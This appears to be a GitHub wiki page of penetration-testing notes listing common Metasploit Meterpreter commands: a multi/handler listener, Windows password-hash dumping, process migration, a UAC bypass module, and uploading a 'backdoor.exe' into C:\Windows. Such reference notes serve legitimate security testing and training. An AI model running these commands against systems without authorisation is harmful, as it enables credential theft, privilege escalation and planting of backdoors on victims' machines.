Skip to content

Common Meterpreter Commands

Jump to bottom
TheGetch edited this page May 14, 2021 · 2 revisions

Common Meterpreter Commands

Common Meterpreter Commands

https://www.offensive-security.com/metasploit-unleashed/meterpreter-basics/

Multi handler:

use exploit/multi/handler

Reopen session:

session -i #

Get hashes:

run post/windows/gather/hashdump

migrate:

run post/windows/manage/migrate

or

use post/windows/manage/archmigrate

Bypass UAC:

Use with an already achieved meterpreter shell:

  • use exploit/windows/local/bypassuac
  • set SESSION <#>
  • exploit

This can be used to enable the getsystem command to work (potentially).

Upload and download files:

meterpreter > download Logs.log /root/ meterpreter > upload /root/backdoor.exe C:\\Windows

_Sidebar

Home

1. Recon

Ping Sweep

CIDR to IP

2. Enumeration

Enumeration General Notes

Host/Port Scanning

Services

01. FTP (21)

02. SSH (22)

03. SMTP (25)

04. DNS (53)

05. HTTP (80,443,8080,8443,etc.)

06. POP3 (110)

07. SMB (139,445)

08. SNMP (161,162)

09. LDAP (389)

10. MS-SQL or MySQL (1433,3306)

11. RDP (3389)

12. Winrm (5985)

13. Memcache (11221)

3. Exploitation

Exploitation General Notes

4. Post Exploiation

Post Exploitation General Notes

Editable Service

Privilege Escalation

Scheduled Jobs/Tasks

5. High Value Information

Hashes

6. Reporting

7. Random Notes/Useful Tidbits

Clone this wiki locally